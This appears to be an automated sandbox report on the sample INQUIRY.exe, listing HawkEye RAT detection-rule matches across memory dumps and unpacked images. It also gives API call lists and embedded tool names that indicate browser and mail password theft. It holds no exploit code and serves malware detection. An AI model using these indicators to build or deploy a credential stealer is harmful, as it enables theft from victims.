                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004557F8 NtdllDefWindowProc_A,0_2_004557F8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00456024
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043A6DC NtdllDefWindowProc_A,GetCapture,0_2_0043A6DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0042E904 NtdllDefWindowProc_A,0_2_0042E904
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00455F74
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_00490159 NtCreateSection,1_2_00490159
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_004557F8 NtdllDefWindowProc_A,2_2_004557F8
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_00456024
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,2_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0043A6DC NtdllDefWindowProc_A,GetCapture,2_2_0043A6DC
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0042E904 NtdllDefWindowProc_A,2_2_0042E904
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_00455F74
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,6_2_00408836
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 004035DC appears 35 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 00404348 appears 78 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 004039A8 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00413F8E appears 66 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00413E2D appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00442A90 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 004141D6 appears 88 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00411538 appears 35 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 004035DC appears 70 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 0040436C appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 004066E0 appears 32 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 0044BA9D appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 00403E24 appears 34 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 0040C2F0 appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 00404348 appears 156 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: String function: 004039A8 appears 80 times
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: INQUIRY.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656350929.00000000026C2000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.655979253.0000000002270000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe Binary or memory string: OriginalFilename vs INQUIRY.exe
                    Source: INQUIRY.exe Binary or memory string: OriginalFileName vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737328211.00000000022F2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000002.00000002.750595289.0000000002270000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.757044777.00000000026E2000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756074232.0000000002160000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamemscorwks.dllT vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000011.00000002.836765666.0000000002160000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Section loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Section loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
